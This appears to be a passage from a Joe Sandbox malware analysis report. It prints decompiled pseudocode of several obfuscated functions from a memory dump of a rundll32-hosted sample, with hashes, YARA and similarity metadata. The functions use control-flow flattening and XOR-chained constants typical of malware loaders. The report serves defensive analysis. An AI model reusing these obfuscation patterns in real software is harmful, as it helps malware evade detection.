                                                                                                                    0x0033b5c3
                                                                                                                    0x0033b5c9
                                                                                                                    0x0033b639
                                                                                                                    0x0033b63e
                                                                                                                    0x0033b64e
                                                                                                                    0x00000000
                                                                                                                    0x0033b64e
                                                                                                                    0x0033b640
                                                                                                                    0x00000000
                                                                                                                    0x0033b640
                                                                                                                    0x0033b5cb
                                                                                                                    0x0033b5d1
                                                                                                                    0x0033b61f
                                                                                                                    0x0033b62a
                                                                                                                    0x0033b632
                                                                                                                    0x00000000
                                                                                                                    0x0033b632
                                                                                                                    0x0033b5d3
                                                                                                                    0x0033b5d9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033b5f9
                                                                                                                    0x0033b5fe
                                                                                                                    0x0033b601
                                                                                                                    0x0033b601

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: V$h5$kn=
                                                                                                                    • API String ID: 0-2568719763
                                                                                                                    • Opcode ID: 9e26ea5e07b4a83d7d9d6791256ce05e6ee86fa935d45bc97abc8b2566074370
                                                                                                                    • Instruction ID: 9d1a6fe82bd75ba539021b25a3ffa9433c20439b7d0fb504a5f1efb3374ab439
                                                                                                                    • Opcode Fuzzy Hash: 9e26ea5e07b4a83d7d9d6791256ce05e6ee86fa935d45bc97abc8b2566074370
                                                                                                                    • Instruction Fuzzy Hash: 58A19771108340CBD72ACF66D59652FFBE4FB85308F14892EF2968A262D7359A09CF47
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00344116 Relevance: 4.0, Strings: 3, Instructions: 223COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00344116() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t220;
				signed int _t222;
				void* _t224;
				void* _t226;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t250;
				void* _t253;
				void* _t258;
				void* _t260;

				_v604 = 0x9b146b;
				_v604 = _v604 | 0x658b3ccc;
				_v604 = _v604 + 0xfffff1f3;
				_v604 = _v604 ^ 0x659b2e62;
				_v596 = 0xb07d39;
				_v596 = _v596 | 0x89b98cff;
				_v596 = _v596 ^ 0x89b9fdfe;
				_v584 = 0x342693;
				_v584 = _v584 ^ 0x5537c6ac;
				_v584 = _v584 ^ 0x5503e03c;
				_v628 = 0x844a73;
				_v628 = _v628 | 0x8aea995b;
				_v628 = _v628 >> 3;
				_v628 = _v628 ^ 0x3316179a;
				_v628 = _v628 ^ 0x224eeca0;
				_v644 = 0xac1c02;
				_v644 = _v644 * 0x6d;
				_t227 = 0;
				_v644 = _v644 << 0xf;
				_t253 = 0x9728f62;
				_t229 = 0x52;
				_v644 = _v644 * 0x23;
				_v644 = _v644 ^ 0xb0e78180;
				_v636 = 0x949b2b;
				_v636 = _v636 / _t229;
				_v636 = _v636 << 4;
				_t230 = 0x48;
				_v636 = _v636 / _t230;
				_v636 = _v636 ^ 0x000805f9;
				_v652 = 0x50f951;
				_v652 = _v652 << 0xe;
				_v652 = _v652 + 0xffff7357;
				_v652 = _v652 >> 5;
				_v652 = _v652 ^ 0x01f330c3;
				_v624 = 0xa7ee55;
				_v624 = _v624 + 0x328f;
				_t231 = 0x36;
				_v624 = _v624 / _t231;
				_v624 = _v624 + 0x3260;
				_v624 = _v624 ^ 0x000caec1;
				_v632 = 0x45b476;
				_v632 = _v632 << 0xf;
				_v632 = _v632 + 0x3fe9;
				_v632 = _v632 + 0xffffc242;
				_v632 = _v632 ^ 0xda30ae70;
				_v576 = 0xb3f46f;
				_v576 = _v576 >> 0xe;
				_v576 = _v576 ^ 0x000becca;
				_v640 = 0x899e10;
				_v640 = _v640 << 3;
				_v640 = _v640 | 0x15c6522a;
				_v640 = _v640 >> 0xc;
				_v640 = _v640 ^ 0x00018fe0;
				_v648 = 0x6b2405;
				_v648 = _v648 | 0xec8a856c;
				_v648 = _v648 + 0xffffe7b2;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 ^ 0x000a0717;
				_v608 = 0xd62f5d;
				_v608 = _v608 + 0xffffa804;
				_v608 = _v608 >> 1;
				_v608 = _v608 ^ 0x00686b18;
				_v580 = 0x2fce72;
				_t232 = 6;
				_v580 = _v580 / _t232;
				_v580 = _v580 ^ 0x000627ef;
				_v612 = 0xa7d19a;
				_v612 = _v612 ^ 0x125f9685;
				_v612 = _v612 ^ 0x35fdcbd7;
				_v612 = _v612 ^ 0x270c67d8;
				_v656 = 0x784491;
				_v656 = _v656 >> 9;
				_v656 = _v656 | 0xfbff7fff;
				_v656 = _v656 ^ 0xfbf9abc9;
				_v616 = 0xc21bdd;
				_t233 = 0x58;
				_v616 = _v616 / _t233;
				_v616 = _v616 | 0xde7eb344;
				_v616 = _v616 ^ 0xde714edb;
				_v620 = 0x22ba29;
				_v620 = _v620 + 0xc334;
				_v620 = _v620 ^ 0x41b5236d;
				_v620 = _v620 ^ 0x4193ad78;
				_v588 = 0x61092c;
				_v588 = _v588 | 0xfbe761ce;
				_v588 = _v588 ^ 0xfbe7142a;
				_v600 = 0xd9609d;
				_v600 = _v600 | 0x95d54fcb;
				_v600 = _v600 ^ 0x95d705b7;
				_v592 = 0xc80f6b;
				_t234 = 0x42;
				_t252 = _v600;
				_v592 = _v592 / _t234;
				_v592 = _v592 ^ 0x0000156e;
				do {
					while(_t253 != 0x25f6a69) {
						if(_t253 == 0x9728f62) {
							_t253 = 0xea70970;
							continue;
						} else {
							if(_t253 == 0x9c0fe90) {
								_t250 = _v632;
								_t220 = E00338F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
								_t252 = _t220;
								_t260 = _t260 + 0x28;
								__eflags = _t220 - 0xffffffff;
								if(__eflags != 0) {
									_t253 = 0xaccbeb9;
									continue;
								}
							} else {
								if(_t253 == 0xaccbeb9) {
									_t222 = E00339350( &_v564, _t252, _v608, _v580, _t234, _v612);
									asm("sbb esi, esi");
									_t250 = _v616;
									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
									_t234 = _v656;
									E00341E67(_v656, _t250, _v620, _v588, _t252);
									_t260 = _t260 + 0x20;
									goto L14;
								} else {
									if(_t253 == 0xdba0984) {
										_t224 = E0034ABD1();
										_t258 = _v572 - _v548;
										asm("sbb ecx, [esp+0x84]");
										__eflags = _v568 - _t250;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t258 - _t224;
												if(_t258 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t268 = _t253 - 0xea70970;
										if(_t253 != 0xea70970) {
											goto L14;
										} else {
											_t250 = _v644;
											_t234 = _v628;
											_t226 = E0034DA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
											_t260 = _t260 + 0x10;
											if(_t226 != 0) {
												_t253 = 0x9c0fe90;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					E0034C1EC(_v600, _v592,  &_v572);
					_pop(_t234);
					_t253 = 0xdba0984;
					L14:
					__eflags = _t253 - 0x15a60c5;
				} while (__eflags != 0);
				goto L20;
			}











































                                                                                                                    0x0034411c
                                                                                                                    0x00344126
                                                                                                                    0x0034412e
                                                                                                                    0x00344136
                                                                                                                    0x0034413e
                                                                                                                    0x00344146
                                                                                                                    0x0034414e
                                                                                                                    0x00344156
                                                                                                                    0x0034415e
                                                                                                                    0x00344166
                                                                                                                    0x0034416e
                                                                                                                    0x00344176
                                                                                                                    0x0034417e
                                                                                                                    0x00344183
                                                                                                                    0x0034418b
                                                                                                                    0x00344193
                                                                                                                    0x003441a4
                                                                                                                    0x003441a8
                                                                                                                    0x003441aa
                                                                                                                    0x003441af
                                                                                                                    0x003441bb
                                                                                                                    0x003441be
                                                                                                                    0x003441c2
                                                                                                                    0x003441ca
                                                                                                                    0x003441da
                                                                                                                    0x003441de
                                                                                                                    0x003441e7
                                                                                                                    0x003441ec
                                                                                                                    0x003441f2
                                                                                                                    0x003441fa
                                                                                                                    0x00344202
                                                                                                                    0x00344207
                                                                                                                    0x0034420f
                                                                                                                    0x00344214
                                                                                                                    0x0034421c
                                                                                                                    0x00344224
                                                                                                                    0x00344230
                                                                                                                    0x00344233
                                                                                                                    0x00344237
                                                                                                                    0x0034423f
                                                                                                                    0x00344247
                                                                                                                    0x0034424f
                                                                                                                    0x00344254
                                                                                                                    0x0034425c
                                                                                                                    0x00344264
                                                                                                                    0x0034426c
                                                                                                                    0x00344274
                                                                                                                    0x00344279
                                                                                                                    0x00344281
                                                                                                                    0x00344289
                                                                                                                    0x0034428e
                                                                                                                    0x00344296
                                                                                                                    0x0034429b
                                                                                                                    0x003442a3
                                                                                                                    0x003442ab
                                                                                                                    0x003442b3
                                                                                                                    0x003442bb
                                                                                                                    0x003442c0
                                                                                                                    0x003442c8
                                                                                                                    0x003442d0
                                                                                                                    0x003442d8
                                                                                                                    0x003442dc
                                                                                                                    0x003442e4
                                                                                                                    0x003442f4
                                                                                                                    0x003442f9
                                                                                                                    0x003442ff
                                                                                                                    0x0034430c
                                                                                                                    0x00344314
                                                                                                                    0x0034431c
                                                                                                                    0x00344324
                                                                                                                    0x0034432c
                                                                                                                    0x00344334
                                                                                                                    0x00344339
                                                                                                                    0x00344341
                                                                                                                    0x00344349
                                                                                                                    0x00344355
                                                                                                                    0x0034435a
                                                                                                                    0x00344360
                                                                                                                    0x00344368
                                                                                                                    0x00344370
                                                                                                                    0x00344378
                                                                                                                    0x00344380
                                                                                                                    0x00344388
                                                                                                                    0x00344390
                                                                                                                    0x00344398
                                                                                                                    0x003443a0
                                                                                                                    0x003443a8
                                                                                                                    0x003443b0
                                                                                                                    0x003443b8
                                                                                                                    0x003443c0
                                                                                                                    0x003443cc
                                                                                                                    0x003443cf
                                                                                                                    0x003443d3
                                                                                                                    0x003443d7
                                                                                                                    0x003443df
                                                                                                                    0x003443df
                                                                                                                    0x003443f1
                                                                                                                    0x003444da
                                                                                                                    0x00000000
                                                                                                                    0x003443f7
                                                                                                                    0x003443f9
                                                                                                                    0x003444b8
                                                                                                                    0x003444c1
                                                                                                                    0x003444c6
                                                                                                                    0x003444c8
                                                                                                                    0x003444cb
                                                                                                                    0x003444ce
                                                                                                                    0x003444d0
                                                                                                                    0x00000000
                                                                                                                    0x003444d0
                                                                                                                    0x003443ff
                                                                                                                    0x00344405
                                                                                                                    0x0034445e
                                                                                                                    0x0034446a
                                                                                                                    0x0034447b
                                                                                                                    0x0034447f
                                                                                                                    0x00344485
                                                                                                                    0x00344489
                                                                                                                    0x0034448e
                                                                                                                    0x00000000
                                                                                                                    0x00344407
                                                                                                                    0x0034440d
                                                                                                                    0x0034450a
                                                                                                                    0x00344513
                                                                                                                    0x0034451e
                                                                                                                    0x00344525
                                                                                                                    0x00344527
                                                                                                                    0x00344529
                                                                                                                    0x0034452f
                                                                                                                    0x00344531
                                                                                                                    0x00344531
                                                                                                                    0x0034452b
                                                                                                                    0x0034452b
                                                                                                                    0x0034452d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034452d
                                                                                                                    0x00344529
                                                                                                                    0x00344413
                                                                                                                    0x00344413
                                                                                                                    0x00344419
                                                                                                                    0x00000000
                                                                                                                    0x0034441f
                                                                                                                    0x00344430
                                                                                                                    0x00344434
                                                                                                                    0x00344438
                                                                                                                    0x0034443d
                                                                                                                    0x00344442
                                                                                                                    0x00344448
                                                                                                                    0x00000000
                                                                                                                    0x00344448
                                                                                                                    0x00344442
                                                                                                                    0x00344419
                                                                                                                    0x0034440d
                                                                                                                    0x00344405
                                                                                                                    0x003443f9
                                                                                                                    0x00344535
                                                                                                                    0x0034453e
                                                                                                                    0x0034453e
                                                                                                                    0x003444f1
                                                                                                                    0x003444f6
                                                                                                                    0x003444f7
                                                                                                                    0x003444fc
                                                                                                                    0x003444fc
                                                                                                                    0x003444fc
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ,a$`2$?
                                                                                                                    • API String ID: 0-2087061617
                                                                                                                    • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                    • Instruction ID: 895d868afc15bc82458fb29ca31d0940aab428ec4a2fda353112d943651e65be
                                                                                                                    • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                    • Instruction Fuzzy Hash: 96A121725083419FC359CF65C88A50BFBF2BBC5718F018A2DF5999A260D3B59A098F46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003359F2 Relevance: 4.0, Strings: 3, Instructions: 202COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E003359F2() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t202;
				void* _t208;
				intOrPtr _t209;
				void* _t214;
				void* _t222;
				intOrPtr _t237;
				intOrPtr _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;

				_t247 =  &_v1140;
				_v1056 = 0x36f622;
				_v1052 = 0x8ed67e;
				_t214 = 0xf737bb2;
				_v1048 = 0x93fb3c;
				_t240 = 0;
				_v1044 = 0;
				_v1076 = 0x48eb17;
				_v1076 = _v1076 + 0x189d;
				_v1076 = _v1076 ^ 0x00442401;
				_v1100 = 0xa45863;
				_v1100 = _v1100 << 2;
				_t241 = 0x1d;
				_v1100 = _v1100 * 0x7c;
				_v1100 = _v1100 ^ 0x3e6538f4;
				_v1108 = 0x56f1ad;
				_v1108 = _v1108 | 0xbff0a597;
				_v1108 = _v1108 / _t241;
				_v1108 = _v1108 ^ 0x06946226;
				_v1132 = 0xc3fd0a;
				_v1132 = _v1132 << 8;
				_v1132 = _v1132 + 0xffff9bc2;
				_t242 = 0x18;
				_v1132 = _v1132 / _t242;
				_v1132 = _v1132 ^ 0x0821d39f;
				_v1068 = 0xc66dea;
				_v1068 = _v1068 + 0xffff0514;
				_v1068 = _v1068 ^ 0x00c0919e;
				_v1136 = 0x72811d;
				_v1136 = _v1136 ^ 0x5ea2c622;
				_t243 = 0x5d;
				_v1136 = _v1136 * 0x4f;
				_v1136 = _v1136 * 0x41;
				_v1136 = _v1136 ^ 0xd3c4c324;
				_v1096 = 0x2e25e6;
				_v1096 = _v1096 ^ 0xbdbebaf9;
				_v1096 = _v1096 ^ 0xbd932287;
				_v1060 = 0x3d42d8;
				_v1060 = _v1060 << 6;
				_v1060 = _v1060 ^ 0x0f5887f2;
				_v1116 = 0xec9c1f;
				_v1116 = _v1116 >> 1;
				_v1116 = _v1116 + 0xcef9;
				_v1116 = _v1116 ^ 0x0078140d;
				_v1084 = 0xf6a299;
				_v1084 = _v1084 >> 9;
				_v1084 = _v1084 ^ 0x00023821;
				_v1124 = 0xf6e97d;
				_v1124 = _v1124 + 0xffff8c4c;
				_v1124 = _v1124 / _t243;
				_v1124 = _v1124 | 0xda1c672f;
				_v1124 = _v1124 ^ 0xda1e012d;
				_v1120 = 0x9bdb66;
				_v1120 = _v1120 * 0x47;
				_v1120 = _v1120 + 0xdb13;
				_v1120 = _v1120 * 0x64;
				_v1120 = _v1120 ^ 0xe2e3c71f;
				_v1112 = 0x9fec0e;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 | 0xd7512eb2;
				_v1112 = _v1112 ^ 0xffdc645c;
				_v1104 = 0xc74eee;
				_v1104 = _v1104 + 0x930c;
				_v1104 = _v1104 ^ 0x28280d38;
				_v1104 = _v1104 ^ 0x28ef0d26;
				_v1064 = 0xc36095;
				_v1064 = _v1064 | 0x2d8f7273;
				_v1064 = _v1064 ^ 0x2dcb1501;
				_v1140 = 0xa3c477;
				_v1140 = _v1140 ^ 0xb16da3ec;
				_v1140 = _v1140 ^ 0x8917fdcb;
				_v1140 = _v1140 >> 0xe;
				_v1140 = _v1140 ^ 0x000e0fa0;
				_v1128 = 0x58136;
				_v1128 = _v1128 << 6;
				_v1128 = _v1128 << 0x10;
				_v1128 = _v1128 + 0xffffe729;
				_v1128 = _v1128 ^ 0x4d79f308;
				_v1072 = 0x735c84;
				_t244 = 0x7f;
				_v1072 = _v1072 / _t244;
				_v1072 = _v1072 ^ 0x0002b970;
				_v1080 = 0x91f75b;
				_v1080 = _v1080 + 0xffffc39e;
				_v1080 = _v1080 ^ 0x009f463e;
				_v1088 = 0xdf4dcf;
				_v1088 = _v1088 | 0x05792173;
				_v1088 = _v1088 ^ 0x05f69aec;
				_v1092 = 0xf44447;
				_v1092 = _v1092 * 0x78;
				_v1092 = _v1092 ^ 0x728504a1;
				do {
					while(_t214 != 0x89b0ee) {
						if(_t214 == 0x291094f) {
							E00333C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
						} else {
							if(_t214 == 0x6a25a64) {
								E0034DA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
								_t247 =  &(_t247[4]);
								_t214 = 0xe0c4196;
								continue;
							} else {
								if(_t214 == 0xe0c4196) {
									_push(_v1096);
									_push(_v1136);
									_t208 = E0034DCF7(_v1068, 0x331000, __eflags);
									_pop(_t222);
									_t209 =  *0x353e10; // 0x0
									_t237 =  *0x353e10; // 0x0
									E003347CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
									E0033A8B0(_v1112, _t208, _v1104);
									_t247 =  &(_t247[9]);
									_t214 = 0x89b0ee;
									continue;
								} else {
									if(_t214 != 0xf737bb2) {
										goto L10;
									} else {
										_t214 = 0x6a25a64;
										continue;
									}
								}
							}
						}
						L13:
						return _t240;
					}
					_push(_v1128);
					_push( &_v1040);
					_push(_v1140);
					_t202 = E003513AD(_v1064,  &_v520, __eflags);
					_t247 =  &(_t247[3]);
					__eflags = _t202;
					_t240 =  !=  ? 1 : _t240;
					_t214 = 0x291094f;
					L10:
					__eflags = _t214 - 0xb653a05;
				} while (__eflags != 0);
				goto L13;
			}










































                                                                                                                    0x003359f2
                                                                                                                    0x003359f8
                                                                                                                    0x00335a02
                                                                                                                    0x00335a0a
                                                                                                                    0x00335a0f
                                                                                                                    0x00335a1b
                                                                                                                    0x00335a1d
                                                                                                                    0x00335a21
                                                                                                                    0x00335a29
                                                                                                                    0x00335a31
                                                                                                                    0x00335a39
                                                                                                                    0x00335a41
                                                                                                                    0x00335a4d
                                                                                                                    0x00335a50
                                                                                                                    0x00335a54
                                                                                                                    0x00335a5c
                                                                                                                    0x00335a64
                                                                                                                    0x00335a74
                                                                                                                    0x00335a78
                                                                                                                    0x00335a80
                                                                                                                    0x00335a88
                                                                                                                    0x00335a8d
                                                                                                                    0x00335a99
                                                                                                                    0x00335a9e
                                                                                                                    0x00335aa4
                                                                                                                    0x00335aac
                                                                                                                    0x00335ab4
                                                                                                                    0x00335abc
                                                                                                                    0x00335ac4
                                                                                                                    0x00335acc
                                                                                                                    0x00335ad9
                                                                                                                    0x00335ada
                                                                                                                    0x00335ae3
                                                                                                                    0x00335ae7
                                                                                                                    0x00335aef
                                                                                                                    0x00335af7
                                                                                                                    0x00335aff
                                                                                                                    0x00335b07
                                                                                                                    0x00335b0f
                                                                                                                    0x00335b14
                                                                                                                    0x00335b1c
                                                                                                                    0x00335b24
                                                                                                                    0x00335b28
                                                                                                                    0x00335b30
                                                                                                                    0x00335b38
                                                                                                                    0x00335b40
                                                                                                                    0x00335b45
                                                                                                                    0x00335b4d
                                                                                                                    0x00335b55
                                                                                                                    0x00335b63
                                                                                                                    0x00335b67
                                                                                                                    0x00335b6f
                                                                                                                    0x00335b77
                                                                                                                    0x00335b84
                                                                                                                    0x00335b88
                                                                                                                    0x00335b95
                                                                                                                    0x00335b99
                                                                                                                    0x00335ba1
                                                                                                                    0x00335ba9
                                                                                                                    0x00335bae
                                                                                                                    0x00335bb6
                                                                                                                    0x00335bbe
                                                                                                                    0x00335bc8
                                                                                                                    0x00335bd5
                                                                                                                    0x00335be2
                                                                                                                    0x00335bea
                                                                                                                    0x00335bf2
                                                                                                                    0x00335bfa
                                                                                                                    0x00335c02
                                                                                                                    0x00335c0a
                                                                                                                    0x00335c12
                                                                                                                    0x00335c1a
                                                                                                                    0x00335c1f
                                                                                                                    0x00335c27
                                                                                                                    0x00335c2f
                                                                                                                    0x00335c34
                                                                                                                    0x00335c39
                                                                                                                    0x00335c41
                                                                                                                    0x00335c49
                                                                                                                    0x00335c57
                                                                                                                    0x00335c5a
                                                                                                                    0x00335c5e
                                                                                                                    0x00335c66
                                                                                                                    0x00335c6e
                                                                                                                    0x00335c76
                                                                                                                    0x00335c7e
                                                                                                                    0x00335c86
                                                                                                                    0x00335c8e
                                                                                                                    0x00335c96
                                                                                                                    0x00335ca3
                                                                                                                    0x00335ca7
                                                                                                                    0x00335caf
                                                                                                                    0x00335caf
                                                                                                                    0x00335cc1
                                                                                                                    0x00335dc8
                                                                                                                    0x00335cc7
                                                                                                                    0x00335cc9
                                                                                                                    0x00335d69
                                                                                                                    0x00335d6e
                                                                                                                    0x00335d71
                                                                                                                    0x00000000
                                                                                                                    0x00335ccf
                                                                                                                    0x00335cd1
                                                                                                                    0x00335ce3
                                                                                                                    0x00335cec
                                                                                                                    0x00335cf4
                                                                                                                    0x00335cfa
                                                                                                                    0x00335d05
                                                                                                                    0x00335d1c
                                                                                                                    0x00335d2f
                                                                                                                    0x00335d3e
                                                                                                                    0x00335d43
                                                                                                                    0x00335d46
                                                                                                                    0x00000000
                                                                                                                    0x00335cd3
                                                                                                                    0x00335cd9
                                                                                                                    0x00000000
                                                                                                                    0x00335cdf
                                                                                                                    0x00335cdf
                                                                                                                    0x00000000
                                                                                                                    0x00335cdf
                                                                                                                    0x00335cd9
                                                                                                                    0x00335cd1
                                                                                                                    0x00335cc9
                                                                                                                    0x00335dd0
                                                                                                                    0x00335ddc
                                                                                                                    0x00335ddc
                                                                                                                    0x00335d78
                                                                                                                    0x00335d80
                                                                                                                    0x00335d81
                                                                                                                    0x00335d90
                                                                                                                    0x00335d97
                                                                                                                    0x00335d9b
                                                                                                                    0x00335d9d
                                                                                                                    0x00335da0
                                                                                                                    0x00335da5
                                                                                                                    0x00335da5
                                                                                                                    0x00335da5
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: &($&($%.
                                                                                                                    • API String ID: 0-466442461
                                                                                                                    • Opcode ID: dbfe62948f5ff092897e2dd0e5ad03a476480ab69c1720ca985fbd65be029e75
                                                                                                                    • Instruction ID: 96406c8f15c5d5f64d288d0fedd4dafc3ce68e6cfea7475e7fdb1155ad965516
                                                                                                                    • Opcode Fuzzy Hash: dbfe62948f5ff092897e2dd0e5ad03a476480ab69c1720ca985fbd65be029e75
                                                                                                                    • Instruction Fuzzy Hash: 82A120B11083819FC759CF26C58941BFBF1FBC4758F109A1DF5A69A220D7B58A09CF46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003513AD Relevance: 3.9, Strings: 3, Instructions: 169COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E003513AD(void* __ecx, void* __edx, void* __eflags) {
				void* _t197;
				signed int _t222;
				signed int _t226;
				void* _t236;
				void* _t245;
				void* _t246;

				_t245 = _t246 - 0x6c;
				_push( *((intOrPtr*)(_t245 + 0x7c)));
				_push( *((intOrPtr*)(_t245 + 0x78)));
				_push( *((intOrPtr*)(_t245 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E003420B9(_t197);
				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
				 *(_t245 + 0x38) = 0xf8747;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
				 *(_t245 + 0x4c) = 0x1e90b9;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
				 *(_t245 + 0x54) = 0x94d35;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
				 *(_t245 + 0x40) = 0x2ce8ae;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
				 *(_t245 + 0x58) = 0x43e6f3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
				 *(_t245 + 0x24) = 0x72d00d;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
				 *(_t245 + 0x34) = 0x43d743;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
				 *(_t245 + 0x2c) = 0xa6821;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
				 *(_t245 + 0x60) = 0x210575;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
				 *(_t245 + 0x44) = 0xde4c18;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
				 *(_t245 + 0x50) = 0xde2575;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
